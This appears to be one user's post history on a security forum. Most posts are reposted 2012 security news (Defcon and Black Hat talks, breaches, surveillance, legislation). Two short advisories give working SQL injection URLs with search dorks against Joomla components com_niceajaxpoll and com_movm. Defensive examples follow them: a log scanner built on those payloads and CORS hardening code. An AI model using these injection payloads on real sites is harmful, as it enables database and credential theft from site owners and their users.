Everything posted by DarkyAngel
-
Anonymous vows to take down the Web sites of a French online fashion retailer that has trademarked the iconic Anonymous logo and slogan. Anonymous' iconic logo was quietly trademarked in France in February, but now that Anonymous has found out, it's not going to take it lying down. Twitter user Asher_Wolf picked up on the trademark application (PDF) yesterday, but the application was first filed with the Institut National De La Propriete Industrielle (INPI) in France on February 16 by Apollinaire Auffret from Early Flicker, encompassing both the Anonymous logo and slogan. Early Flicker has an eBay store that appears to sell a variety of Anonymous-themed T-shirts. Following the revelation yesterday, Anonymous has responded via a YouTube video, and has promised distributed denial-of-service attacks on Early Flicker's sites. Below is the Anonymous response. Source
-
Police are indiscriminately capturing photos of license plates with cameras on roadways that also record the date, time and location, ACLU says. LAS VEGAS - The American Civil Liberties Union wants to know how police around the country are using automatic license plate readers to track people's movements. The ACLU today sent requests for information to police departments in 38 states and filed federal Freedom of Information Act requests with the departments of Justice, Homeland Security and Transportation to try to find out how much the governments use the technology and how much it is paying to expand the program. Mounted on patrol cars, telephone poles and under bridges, the automatic license plate readers (ALPRs) can snap a photograph of every license plate that passes by. They also record the time, date and location based on GPS, and send an alert to officers when a license plate is recorded that matches a stolen vehicle, according to the ACLU. It's unclear how long the data is retained, whether different departments are pooling the information in state, regional and national databases and what purposes it is used for, Kade Crockford, director of technology for the Liberty Project at the ACLU of Massachusetts, told CNET at Defcon this weekend. Tracking and recording data on people's movements so broadly raises serious privacy concerns because it means police will be able to know who goes where, when and for how long, Crockford said. The system would also allow police to do retroactive surveillance, by searching in the data for a specific car's whereabouts at any point in time, she added. Crockford is concerned about the broad scope of the surveillance, which can track every motorist, not just those who are suspected of crimes. "The system is ripe for abuse," for mass routine location tracking, as well as for unwarranted use against select individuals, she said. "They will have all this data on people who have not been accused of any wrongdoing," Crockford said. "Do we want a world in which the police know where we were five years ago?" Meanwhile, private companies like tow truck operators are also using the systems and selling the data to police and data mining firms, she said. The government needs to set standards for collecting, retaining and sharing the data and impose strict requirements to provide privacy protections for people now before the systems become too widespread, Crockford said. Spokespeople at the DHS did not immediately respond to a request for comment. A DOJ spokeswoman said the agency does not comment on pending FOIA requests. A DOT spokeswoman said she had passed the request to the appropriate officials. The controversial systems are already taking some heat. After lawmakers in Utah expressed privacy concerns about them, the U.S. Drug Enforcement Agency withdrew its request to have automated license plate readers installed on parts of Interstate 15 in that state, but has not said it is abandoning the program, the Deseret News of Salt Lake City reported last month. The police might take a cue from Google, which said it would remove license plates from its Google Map Street View images after people complained. Source
-
German security researcher says the Chinese government doesn't need to demand back doors on Huawei routers because there are already major holes in their firmware. LAS VEGAS -- A German security researcher says he has uncovered several security holes in routers made by China-based Huawei that are used by many Internet service providers -- vulnerabilities that could allow attackers to take control of the devices and snoop on people's traffic. Huawei routers are mostly used in Asia, Africa and the Middle East. Because they're cheap, though, they're increasingly turning up in other parts of the world, the German researcher -- Felix Lindner, also known as "FX" -- said in an interview with CNET after his Defcon talk on Sunday. The problem is due to the use of "1990s-style code" in the firmware of some Huawei VRP routers, he said. (The models are the Huawei AR18 and AR 29 series, IDG News Service reports). With a known exploit, an attacker could get access to the systems, log in as administrator, change the admin passwords and reconfigure the systems, which would allow for interception of all the traffic running through the routers, said Lindner, who heads Berlin-based Recurity Labs. Asked about reports that Huawei routers have back doors per the Chinese government's request, Lindner said: "They don't need to. You (just) need to have Huawei people running your network or help run your network... If you have so many vulnerabilities, they are the best form of (attack) vector." Reached for comment earlier today, a U.S.-based Huawei spokeswoman said she would e-mail a statement to CNET. This post will be updated when we receive the statement. The research is scary for not only the ISPs using the vulnerable routers, but also for millions of their customers who don't realize that their communications could be spied on, said Dan Kaminsky, security expert and chief scientist at DKH. "It's a big deal for routers to get broken into," especially those made by the fastest growing router manufacturer, he told CNET. "If you can get into a router you can take it over, monitor and alter people's traffic. You become a man-in-the-middle" attacker who can spoof legitimate Web sites. Even systems that rely on encryption aren't safe because many of them have inadequate authentication, which allows attackers to pretend to be any site they want, Kaminsky said. Update, July 31 at 10:16 a.m. PT: A U.S.-based Huawei representative provided CNET with the following statement: Source
-
Looking for a high-grade door lock? How about a satellite phone? Or maybe you've been craving a Wi-Fi Pineapple? Whatever gadget you desire, chances are you can buy it in the vendor room at Defcon. LAS VEGAS -- While ninjas inhaled much of the available oxygen in the vendors room, with its truck-based Ninja Tel mobile network, other vendors offered a more esoteric menu of hackables at Defcon this year. Vendors at the hackers conference came in all sizes. Some signed up hackers to donate their skills to impoverished communities. Others appealed to sartorially minded hackers, with unofficial Defcon 20 T-shirts and other wearables. In this gallery, CNET showcases three vendors who were offering something interesting or unexpected: Hak5's Darren Kitchen and his penetration-testing tools; Meco proprietor Ira Moser and his collection of antiquated yet usable hardware; and Mitch Capper and SecuritySnobs.com with their set of unusual locks. More pics here! Source
-
http://p-o-s.org Is Up -> Check if your website is up or down? What do you mean by "it doesn't open"?
-
Joomla com_niceajaxpoll <= 1.3.0 SQL Injection Vulnerability
DarkyAngel posted a topic in Exploituri
Title : Joomla com_niceajaxpoll <= 1.3.0 SQL Injection Vulnerability
Author : Patrick de Brouwer - @knickz0r
Dork : inurl:"/index.php?option=com_niceajaxpoll"

+ -- --=[ 0x01 - Software description
Nice Ajax Poll is a component for the Joomla! CMS which allows users to vote on certain questions or statements.

+ -- --=[ 0x02 - Vulnerability description
There is a SQL Injection vulnerability that can be called from within the website to perform the SQL Injection attack.

+ -- --=[ 0x03 - Impact
The impact of this vulnerability should be rated as critical as it is possible to access the database and therefore retrieve user information such as usernames, passwords and other data. When abused, hackers could gain access to the administrative interface of Joomla.

+ -- --=[ 0x04 - Affected versions
As of the source code, the version containing this vulnerability was version 1.3.0. It was not proven that the vulnerability does not exist in newer or earlier versions. Therefore the vulnerability is considered available in versions below 1.3.0.

+ -- --=[ 0x05 - Vendor contact trail
Contact has not been made with the author. Author will receive a copy of the vulnerability disclosure.

+ -- --=[ 0x06 - Proof of Concept (PoC)
In: /components/com_niceajaxpoll/views/niceajaxpoll/tmpl/default.php there is a call to: index.php?option=com_niceajaxpoll&getpliseid="+id, which is located on line 32. In practice this vulnerability has been verified by exploiting the following:
/index.php?option=com_niceajaxpoll&getpliseid=1 OR 1=1
(SQLi in the getpliseid parameter)
Source
-
Exploit Title: Joomla com_movm SQL Injection
Date: [31-07-2012]
Author: Daniel Barragan "D4NB4R"
PoC: http://server/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20
Source
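Detection logic for the two injection points above, as an added example that is not part of either advisory: a scanner over combined-format access logs that flags the component parameters named in the advisories (both are supposed to carry a plain numeric id). The log lines, addresses and timestamps are constructed.

```python
"""Flag SQL-injection attempts against the two Joomla components named in the
advisories above by scanning web-server access logs.  Added example, not part
of either advisory; the log lines and addresses below are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Component -> parameter the advisories identify as injectable.
WATCHED_PARAMS = {
    "com_niceajaxpoll": "getpliseid",
    "com_movm": "id",
}

# Signatures checked against the *decoded* parameter value.
SIGNATURES = [
    ("tautology", re.compile(r"\bor\b\s+\S+\s*=\s*\S+", re.I)),            # 1 OR 1=1
    ("union-select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("sql-comment", re.compile(r"--(?:\s|$)")),                              # trailing --
]

# Apache/nginx combined log format, up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(path):
    """Return None if the path does not hit a watched component parameter,
    otherwise a dict with the decoded value and the reasons it looks like
    injection (an empty reason list means the request is benign)."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    option = params.get("option", [""])[0]
    name = WATCHED_PARAMS.get(option)
    if name is None or name not in params:
        return None
    value = params[name][0]  # parse_qs already percent-decodes and turns '+' into ' '
    reasons = [label for label, rx in SIGNATURES if rx.search(value)]
    if not value.strip().isdigit():
        reasons.append("non-numeric id")
    return {"component": option, "param": name, "value": value, "reasons": reasons}


def scan_log(lines):
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify_request(m.group("path"))
        if result and result["reasons"]:
            result.update(ip=m.group("ip"), ts=m.group("ts"), status=int(m.group("status")))
            findings.append(result)
    return findings


# Constructed sample log: one benign and one injected request per component.
SAMPLE_LOG = r'''
10.0.0.5 - - [31/Jul/2012:10:16:01 +0000] "GET /index.php?option=com_niceajaxpoll&getpliseid=3 HTTP/1.1" 200 842
10.0.0.9 - - [31/Jul/2012:10:16:05 +0000] "GET /index.php?option=com_niceajaxpoll&getpliseid=1%20OR%201=1 HTTP/1.1" 200 12043
10.0.0.7 - - [31/Jul/2012:10:16:08 +0000] "GET /index.php?option=com_movm&controller=product&task=product&id=12 HTTP/1.1" 200 3310
10.0.0.9 - - [31/Jul/2012:10:16:09 +0000] "GET /index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20 HTTP/1.1" 200 3310
'''.strip().splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['component']}.{f['param']}={f['value']!r}: "
              f"{', '.join(f['reasons'])}")
```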
-
- New application -> PoS Chat, which can be accessed only from inside the PoS, based on blueimp ajax chat.
- Following the ^ PoS chat, the Chat (or the Board) -> becomes Announcements, and only administrators can post.
- Radio RST updated, works excellently.
- The top dock modified: chat + radio added to "Network", the help application added to "System".
- It now supports more file types; if you come across a file that isn't supported and think it would be useful to "implement" it, send an "internal message" from the "Mail" application to DarkyAngel or ps-axl, or use "Ask for help" in the "Help" application.
P.S.: for a file that isn't supported, a window will appear telling you that it isn't supported yet / doesn't work.
P.S.2: likewise, if you find any bug / error / security problem you can report it the same way explained above (message to DarkyAngel or ps-axl, or "ask for help").
-
well.. considering you got the category wrong.. P.S.1: Google can help you.. P.S.2: https://blueimp.net/ajax/
-
Amendments to cybersecurity bill in Senate aim to boost privacy protections. As the U.S. Senate races toward its August recess, lawmakers are filing tons of amendments to the Cybersecurity Act, a number of them designed to add privacy protections. The amendments are an effort to meet the wishes of pro-business Republicans and pro-privacy Democrats and to reach a compromise that can be enacted into law. Sen. Harry Reid (D-Nevada) is pushing to get cybersecurity legislation voted on this week before the Senate breaks for recess in August. The Democrat-based Cybersecurity Act of 2012, sponsored by Sen. Joseph Lieberman (I-Conn.), as it stands has already been modified to meet the needs of both sides of the aisle. Earlier this month, the bill was revised to remove a provision calling for critical infrastructure providers to meet minimum security standards, which Republicans argued was too regulatory and restrictive on businesses. It also added a provision preserving the civil liberties and privacy of users. Republicans want security standards to be voluntary rather than government-driven and Democrats want to ensure that consumer privacy is protected when firms share information on cybersecurity incidents with the government. More than 70 amendments have been filed, Broadcasting and Cable reported today. Some were totally unrelated to the topic of cybersecurity, such as gun control-related amendments and amendments that try to undermine the health-care law. In one of his three amendments, Sen. Ron Wyden (D-Ore.) is trying to prevent warrantless tracking of people via GPS (Global Positioning System) data. Wyden wants clear rules for how and when the government can access location tracking data from individuals' cell phones and other electronic devices. Specifically, the first amendment would require that government agencies get a probable cause warrant to obtain geolocation data. It also would force corporations to get customer consent before sharing customer data outside the normal course of business and would make it a crime to secretly track someone's movements online. Wyden also wants to limit government access to private consumer data stored by cloud-storage services alongside government data, and to strengthen limits on sharing individuals' personal information with law enforcement. The second Wyden amendment would prohibit government from accessing consumers' private data solely because it's stored by a company that provides information services to a government agency. And a third amendment would require Congressional approval before the president could enter the U.S. into a binding international agreement on cybersecurity. Sen. Al Franken (D-Minn.) has introduced an amendment that would delete provisions in the Cybersecurity Act that allow ISPs and others to monitor their customers' communications and deploy countermeasures without government oversight or legal liability. And Sen. Patrick Leahy (D-Vt.) yesterday filed several amendments also related to privacy, including provisions that make it a crime for companies to hide data breaches from customers, require companies with databases of sensitive consumer data to take security precautions, and call for a national standard for data-breach notification. In addition, he has proposed language that would allow people to share video-viewing history online, which is currently prohibited because of a law designed to protect video-rental records during the 1980s. Lawmakers and the Obama Administration are anxious to get a measure in place to keep hackers, cyberspies, and malware out of the computer systems of power companies, utilities, and other critical infrastructure providers in the face of growing cyberattacks and threats. Source
-
After a two-week investigation, the online file storage service confirms that usernames and passwords were stolen from third party Web sites and then used to access Dropbox accounts. When a few hundred Dropbox users began receiving spam emails about online casinos and gambling sites two weeks ago, it seemed like something was up. And indeed there was. The online file storage service confirmed today that hackers accessed usernames and passwords from third party sites and then used them to get into Dropbox users' accounts. "Our investigation found that usernames and passwords recently stolen from other websites were used to sign in to a small number of Dropbox accounts. We've contacted these users and have helped them protect their accounts," the company wrote in a blog post today. "A stolen password was also used to access an employee Dropbox account containing a project document with user email addresses. We believe this improper access is what led to the spam." When the problem first began earlier in the month, several Dropbox users posted on the company's Web site forum saying they received spam at email addresses only associated with Dropbox. By the time the company got a hold on the situation, 295 people had posted on the forum. The majority of the users were European, coming from Germany, Holland, and the U.K. Dropbox has since put in place additional security controls to avoid a repeat occurrence. According to the company blog post, here are some of the steps it is taking: The file storage service also recommends that users avoid using the same password on multiple sites, since it means that if one site has a security breach then all accounts could be at risk. As TechCrunch notes, Dropbox's security breach is eerily reminiscent of LinkedIn's mega-password leak in June. Source
-
Microsoft is dropping the Hotmail brand. Users of the email service will soon be redirected to the new Outlook.com, which offers an improved experience with the graphical elements of the Metro interface from Windows 8. The simplification of Microsoft's services continues with the elimination of Hotmail, the email service launched in 1996. Users can currently try the new email interface on the Outlook.com site, where you will be logged in automatically if you are already logged in to Hotmail. Apart from the new interface, which looks a lot like Gmail, Microsoft is preparing 3 key elements for the new Outlook.com email. The new email that replaces Hotmail benefits from SkyDrive integration, so that attachments of any size can be accessed on any gadget, and the calendar from Windows 8 will be synchronized in a similar way. Outlook.com is the first email service connected directly to Facebook, Twitter, LinkedIn and Google, and Skype will join the list soon. In addition, the new Microsoft email also includes free web applications. Microsoft Word, PowerPoint, Excel and OneNote documents will thus be editable by users directly in the inbox. Source
-
Windows 8 appears to be the most secure operating system, after it "escaped" untouched by hackers' attacks at the Black Hat and DEF CON conferences. And Windows Phone 8 could be the most secure mobile operating system. The protection measures against malware applications have a price, though: the user's actions are more restricted than before, but their files and personal information are safer. While the Secure and Trusted Boot options provide complete protection against rootkit applications, every Metro application runs in a sandbox. Cyberattacks are made much harder, because Windows 8 warns about any application downloaded online that could create vulnerabilities. The complete absence of malware applications for Windows Phone 7 has not, however, stopped Microsoft's specialists from introducing similar safety options for Windows Phone 8. It remains to be seen whether the new Microsoft operating system, prepared for a launch on October 26, will truly offer the promised protection. Source
-
Police in South Korea have reportedly arrested two people for hacking into the network of KT Corp., the country's second largest mobile carrier, and selling the data. According to a report by the Yonhap News Agency, police arrested a 40-year-old suspect – identified only by his family name of Choi – as well as a second person and accused them of leaking the personal information of roughly 8.7 million mobile phone subscribers since February. Police suspect the telemarketers used the data, which contained information about the subscribers, their phones and monthly plans, to contact customers whose contracts were close to expiring or who were judged to be likely to change phone plans. Authorities estimate the suspects earned at least 1 billion won (US$877,000) from the illegal marketing scheme. "It took nearly seven months to develop the hacking program and (the suspects) had very sophisticated hacking skills," an official at the National Police Agency's cyber terror response team told the Yonhap News Agency. KT apologized for the incident, noting in a statement that it has recovered the leaked information and taken necessary steps to prevent any further leaks. The company asked police to investigate possible leaks July 13 after observing suspicious activities through internal monitoring, according to a report in BusinessWeek. "In light of this incident, we will strengthen the internal security system and raise awareness of security among all employees to prevent causing inconvenience to customers," the carrier said in a statement to Yonhap. A year ago, an even more significant breach occurred when hackers hit SK Telecom, yet another one of South Korea's large telecommunications companies. In that incident, personal information belonging to 35 million users of SK Telecom's Cyworld social networking service and Nate web portal was exposed. Source
-
Sophos on Monday officially launched Sophos Mobile Security, a free mobile security solution designed to protect Android devices against malware, privacy issues and lost hardware. With minimal impact on device performance or battery life, Sophos says the solution makes use of near real-time intelligence from its network of threat intelligence centers and automatically scans apps as users attempt to install them, and blocks potentially dangerous apps and malicious code. Sophos Mobile Security also helps locate lost or stolen Android devices and provides a remote lock to help lock down and protect data in the event a mobile device is lost or left behind. In its 2011 Mobile Threats Report, Juniper Networks said there was a 155 percent increase in mobile malware across all mobile platforms in 2011, and a whopping 3,325 percent increase in malware specifically targeting the Android platform in the last seven months of 2011 alone. "We're seeing no slowdown in the number of malicious apps, as more smartphone owners use their devices to not only store personal data, but also access social networks and the Internet," said Matthias Pankert, vice president, product management, Sophos. "Android users must be vigilant as the number of threats continues its rapid ascent…" The company said that later this year it will offer a managed Enterprise version of Sophos Mobile Security that will come with enhanced functionality and provide better protection for corporate devices and data. Sophos Mobile Security is available from Google Play here. Source
-
A researcher with viaForensics demonstrated how to beat encryption for Android devices at the DEF CON security conference in Las Vegas. According to Thomas Cannon, director of research and development for viaForensics, the idea was to demonstrate the ways that black hats – or the government – can get access to the data on a user's phone if it is lost, seized or stolen. Rather than rely on a flaw in the encryption itself, Cannon chose to show how a sophisticated attacker can brute force weak passwords protecting a device. "I presented on a number of methods for gaining access to user data on Android devices," he told SecurityWeek after his presentation. "Our initial review is that the encryption is solid and implemented properly," he continued, "so the only option we have is to brute force the user password and derive the correct encryption key. I showed how the encryption is implemented, how to brute force the password, and that for PINs we can do it in seconds… We also released a tool which cracks PINs as a proof of concept." According to Thomas Cannon, a hacker would have to obtain a copy of the userdata partition and the encrypted master key with salt stored in a footer file. To do this, the attacker would need to obtain access to the device through an unlocked bootloader, JTAG, chip-off or an exploit in the firmware. "Once you have those, you can run password guesses through the decryption process and see if it is successful (at a simple level)," he said. "This is automated and can be optimized to try large numbers of guesses very fast. The implications of the attack are that if you have a weak encryption password it will be possible to crack your encrypted key and get at your data in a reasonable time frame. In that sense it is no different from any other system which uses passwords." He described the level of sophistication necessary for the attack as high. "So the presentation was about how your data can be accessed and the techniques used; it wasn't aimed at warning users about a flaw in the encryption," he said. "If there is a flaw it is that on stock Android devices the encryption password is the same as the lock screen password, meaning that users set passwords that are easy and quick to type, which can be cracked. Advanced users with root access can change their encryption password while keeping their lock screen password simple, but this isn't an option for regular users. It is a balance between convenience and security, and the users have to decide where to draw that line." Source
-
normal, people just want to make money, right? he has 10 posts, and didn't know where else to advertise. he deserves a ban anyway.
-
level 9.. I think he's 17, pretty much everyone in the top 10 or whatever it is are 17 at most..
-
1. inappropriate title 2. too few posts 3. shall we go on..? how many more rules are you breaking? P.S: you have viruses
-
Bit9 Raises $34.5 Million In Round Led By Sequoia Capital
Bit9, a provider of application whitelisting security solutions, today announced that it has closed $34.5 million in Series D funding in a round led by Sequoia Capital. The company says it will use the new capital to fund new product development efforts and expand sales and marketing. Bit9 provides trust-based application control and whitelisting technologies to help companies defend against advanced threats that traditional anti-malware protections may not identify. The company's security solutions help provide visibility and control over all software on endpoints, to reduce the risk caused by malware, targeted attacks and Advanced Persistent Threats. "This latest round of funding is the largest in the company's history and underscores the support Bit9 has received from investors who understand the changing nature of the security market," said Patrick Morley, president and CEO of Bit9. "It places a bet squarely on our vision and technology. It's an exciting time as we are dramatically changing how organizations protect themselves from IP theft and advanced attacks by focusing on a trust-based approach." The company says that it has grown 100 percent year-over-year for the past two years, and currently protects more than 700 organizations across various industries including education, finance, government, healthcare, retail and utilities. In 2003, Bit9 was awarded a $2M United States federal research grant from the National Institute of Standards and Technology-Advanced Technology Program (NIST ATP) to conduct the research that is now at the core of its application whitelisting solutions. In April 2011, Waltham, Massachusetts based Bit9 raised $12.5 million in funding. In September 2011 the company announced that Richard Clarke, former Cybersecurity Czar for President George W. Bush, joined the company's Board of Directors. Existing investors Atlas Venture, Highland Capital Partners, Kleiner Perkins Caufield & Byers, and .406 Ventures also participated in the round. Source
-
InfoSec Needs to Improve Organizational Communication [Black Hat]
BLACK HAT USA 2012 - Information security professionals can establish a better relationship with the users within the organization by improving lines of communication, a security analyst told Black Hat attendees. Information security professionals are struggling to improve organizational acceptance of information security and to convince users to view security differently, James Philput, a senior information security analyst with Information Assurance Professionals, said during a presentation on the last day of the Black Hat conference in Las Vegas. One way to accomplish this goal was to change how IT interacted with users on a regular basis, Philput said. Infosec doesn't have the best reputation among its users, Philput pointed out. People regularly accuse security of getting in the way of work. IT often takes the preventive approach of ignoring what users are saying and locking things down, Philput said. Instead, the security team should be listening to what the users need and what they are looking for, he said. Business needs always trump security, Philput said, adding, "Geeks hate this." Changing perspectives within the organization may be "daunting, but doable," Philput explained. Infosec needs to speak in terms the users understand, such as reminding executives that the cost of a data breach includes damage to the brand as well as to individual executives' reputations, Philput said. The goal is to make the users care about doing the right thing without resorting to heavy-handed tactics. "Users accept limitations they understand," Philput said. As a case study, Philput described a situation in which a medical clinic was looking to deploy a less secure system for accessing patient records. By taking the time to speak with the clinicians, the security team could figure out why the users preferred the proposed system, and then identify issues the users recognized as problems, Philput suggested. Instead of focusing on costs or issues with policy, the team could highlight problems with HIPAA compliance, which the clinicians are more likely to be concerned about, Philput said. "Don't forget to listen to the users," Philput said, noting that by listening, the team can often come up with workarounds to solve the problem at hand. Information security professionals were often the biggest obstacles in gaining user acceptance because they create an antagonistic situation where it's "us versus them," Philput said. "Not fully understanding IT is not a crime," he added, noting that the users are experts in their respective fields, such as marketing. Different groups of users want different types of information from information security. C-level executives are generally concerned about how much they have to spend to get a certain outcome, and what is the easiest task. In contrast, non-technical managers generally want to know how something impacts the company and the individual users, and why it matters, Philput said. And finally, technical managers want to know what the problem is, how it will be solved, and the likelihood of any issues. The bad guys are winning in the security war and for the good guys to have any shot at winning, infosec and users need to cooperate, Philput said. "Unless you have the backing of the users, it's never going to happen." A final simple piece of advice from Philput: "Write shorter emails." Source
-
HTML5 Top 10 Security Threats, Stealth Attacks and Silent Exploits

HTML5, the new Web standard that will make it easier to develop websites and applications that run on various screen sizes, is also vulnerable to stealth attacks and silent exploits, a security researcher said at the Black Hat security conference.

HTML5 faces a number of threats, including cross-site scripting and resource hijacking, Shreeraj Shah, founder of application security vendor Blueinfy, told attendees at the Black Hat security conference in Las Vegas Thursday. The fact that the new Web standard has cross-platform support and integrates several other technologies increases the attack surface, Shah said. Even though it is still new and evolving, attacks against the new standard are already on the rise, Shah said.

HTML5 pulls together many components, including XMLHttpRequest (XHR), cross-origin resource sharing (CORS), WebSQL, and localStorage. In addition to the elements included in the specification such as Web messaging, Web sockets, and Canvas 2D, HTML5 includes related technologies such as SVG for graphics, CSS3 for stylesheets, Geolocation, and APIs for Calendar and File, among others. “HTML5 is out there and people are using it,” Shah told attendees.

Attacks against HTML5 are stealthy and silent, and generally target the application's presentation and business logic layers, Shah said. The top 10 threats against HTML5 target XHR and HTML5 tags, feature-rich components such as browser SQL and storage, and the DOM, said Shah. The list is as follows:

1. CSRF with XHR and CORS bypass
2. Jacking – click, CORS, tabs
3. HTML5-driven cross-site scripting using tags, events and attributes
4. Attacking storage and DOM variables
5. Exploiting Browser SQL points
6. Injection with Web Messaging and Workers
7. DOM-based cross-site scripting and issues
8. Offline attacks and cross-widget vectors
9. Web socket issues
10. API and protocol attacks

The new technologies that make up HTML5 bring in several new threats. CORS is vulnerable to data transfer and origin issues, HTML5 forms can be manipulated, and client-side storage and SQL expose the application to injection attacks, Shah said. It was critical to address how these attack vectors would work in today's environment before attackers start taking advantage of these features for malicious purposes, Shah explained.

Shah called the XHR object in HTML5 “very powerful,” as it allows a variety of features, such as cross-origin requests and binary uploads and downloads. Attacks include bypassing CORS preflight calls, forcing authentication cookies to replay with credentials, internal network scanning and tunneling, information harvesting, and abusing the business logic by uploading binary streams. Users could be tricked into uploading content onto the server, Shah said.

Some of the threat vectors can be mitigated by strengthening the CORS implementation, using secure JavaScript coding practices, and improving CORS controls, Shah said. Developers should look at secure libraries for streaming HTML5/Web 2.0 content and secure CORS. Developers should also employ standard cross-site-scripting protections and not store sensitive information inside localStorage.

Shah called the top 10 vectors just the “beginning,” and said that HTML5 is just “warming up.” Different libraries and ways of development are bound to emerge over time and open up new risks and security issues. Looking at these threats would provide some ideas about security controls necessary for future applications, he said.

Source
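As an added example that is not part of the original post, the following Python shows the server side of threat number 1 above: the reflecting CORS pattern that lets any origin replay a victim's cookies through XHR, next to an allowlisted version with a preflight check and a custom-header requirement for state changes. The origins, methods and header names are constructed for the demo.

```python
from urllib.parse import urlsplit

# Constructed allowlist for the demo; a real deployment loads these from configuration.
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}
ALLOWED_METHODS = {"GET", "POST"}
ALLOWED_REQUEST_HEADERS = {"content-type", "x-requested-with"}

def cors_headers_reflecting(origin):
    """Weak pattern: whatever Origin the browser sends is echoed back together with
    Allow-Credentials, so a page on any site can make the victim's browser replay its
    cookies through XHR and read the response (the CORS bypass / CSRF the talk describes)."""
    return {"Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true"}

def cors_headers_allowlisted(origin):
    """Hardened pattern: exact-match allowlist, never a wildcard together with credentials,
    and Vary: Origin so a shared cache cannot hand one origin's response to another.
    Returns None when the origin must be refused."""
    if not origin or origin == "null":          # "null" is sent for sandboxed/file: pages
        return None
    parts = urlsplit(origin)
    if parts.scheme != "https" or parts.path or parts.query or "@" in parts.netloc:
        return None                             # malformed or downgraded origin
    if origin not in ALLOWED_ORIGINS:           # exact match: no prefix/suffix/regex games
        return None
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}

def handle_preflight(origin, requested_method, requested_headers):
    """Answer an OPTIONS preflight. Returns (status, headers); a 403 carries no CORS headers."""
    base = cors_headers_allowlisted(origin)
    if base is None:
        return 403, {}
    wanted = {h.strip().lower() for h in requested_headers.split(",") if h.strip()}
    if requested_method not in ALLOWED_METHODS or not wanted <= ALLOWED_REQUEST_HEADERS:
        return 403, {}
    base.update({"Access-Control-Allow-Methods": ", ".join(sorted(ALLOWED_METHODS)),
                 "Access-Control-Allow-Headers": ", ".join(sorted(wanted)),
                 "Access-Control-Max-Age": "600"})
    return 204, base

def accept_state_change(method, origin, headers):
    """Gate for cookie-authenticated state changes. A cross-site form or simple XHR cannot add a
    custom header without a preflight, so requiring X-Requested-With forces the allowlist check
    above to run before any cookies are replayed. Assumes the browser sends Origin on POST."""
    if method in ("GET", "HEAD"):
        return True
    if cors_headers_allowlisted(origin) is None:
        return False
    return "x-requested-with" in {k.lower() for k in headers}
```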
-
Securing The Virtualized Data Center - Top Five Considerations

We are currently deep in the throes of a global data center refresh cycle, driven by technology and business drivers. Virtualization and cloud computing are changing how data centers are being architected. The new threat landscape has framed the challenge of securing data and applications in a new light, and secure mobility and the extended enterprise have amplified the complexity of data center access. As organizations look at data center consolidation or new data center designs, it’s a great time to be thinking of security, and building it into the network architecture instead of attempting to bolt it on later.

This principle of “building security into the network” isn’t new. Security architects have long espoused the benefits of doing so, as adding security after the fact is likely to increase costs and complexity. Imagine if automobile companies manufactured cars without seat belts or airbags; the cost to add them later would not only be prohibitive, it would negatively impact both the bolted-on functions delivered and the overall characteristics of the product. Similarly, the performance of a data center would likely be impacted if you bolted security on later.

In principle, building security into the virtualized data center seems simple enough. But where and how do you start? Here are the top 5 things you should consider.

Create a Security Policy

As the King said to Alice in Wonderland, "Begin at the beginning, and go on till you come to the end, then stop." The very beginning, the very first thing you should do, is define your security policy. A security policy is a necessary evil: it is a blueprint that defines the overall security objectives, rules and regulations for an organization. Without it, you either spend your time fighting security fires as they flare up or walking around completely lost as to which rules are enforceable and which are not.

A security policy may include a disaster recovery plan, governmental and industry regulations to comply with, safe application enablement policies and more. The security policies should tightly align with the business objectives for the organization, must have the buy-in of key stakeholders, must be documented and communicated, and must be enforced.

There are specific characteristics of the virtualized data center that you will need to consider in the security policy, such as the ability for services to be delivered in a more dynamic, on-demand way. Therefore, your policy should consider the implications of combining virtualization workloads with different trust levels on the same server, and whether live migration of VMs should be restricted to servers supporting workloads with the same trust levels. Security is complex enough; allow yourself room to address requirements in a phased approach. For example, in the initial phase of your virtualized data center, allow only workloads with the same trust levels on a server. Over time, you can allow workloads with different trust levels on the same server, and plan for a policy change to accommodate intra-host VM traffic inspection within the server.

Define the Applications in the Data Center

The key principle to apply with application enablement in your virtualized data center is to build a positive enforcement policy. A positive enforcement approach for your virtualized data center means that you identify, control and allow what is required for business operations in your organization. The alternative, negative enforcement approach means you would selectively block everything that is not allowed, requiring a significant amount of never-ending effort to track all new applications and decide if they should be enabled or not.

The task to identify and safely enable applications in the virtualized data center is harder than it seems. Application developers have been known to implement applications on any port that is convenient or bypass security controls altogether. It is not uncommon to find tech-savvy employees using remote access tools on non-standard ports. DBAs are equally guilty of running SQL instances on non-standard ports. The ease of application creation and delivery with virtualized data centers and cloud exacerbates the problem.

The problem is that applications can also be used as a launch platform for attacks and carry threats inside a company’s network. Many applications are using tactics like non-standard ports, port-hopping, hiding within SSL encryption, and tunneling within commonly used services to bypass traditional security controls. Understanding your applications, and safely enabling only applications required for the day-to-day business operations, helps to reduce the attack surface for your organization.

Fortunately, next-generation security solutions can help with this. In fact, by deploying next-generation firewalls in monitor mode, you can get visibility into all data center traffic and begin to create this list of “allowed” and IT-sanctioned applications, before safely enabling different application functions at a granular level. Once you have identified all of your applications, you can also inspect the allowed applications for any embedded threats.

In a well-designed virtualized data center, unknown traffic should be a very small percentage of traffic, if it exists at all. The ability to identify and analyze unknown traffic is essential in a data center. A next-generation firewall provides the ability to categorize and analyze unknown traffic in the network to determine whether the traffic is being generated by a legitimate application that is not recognized or is malicious malware.

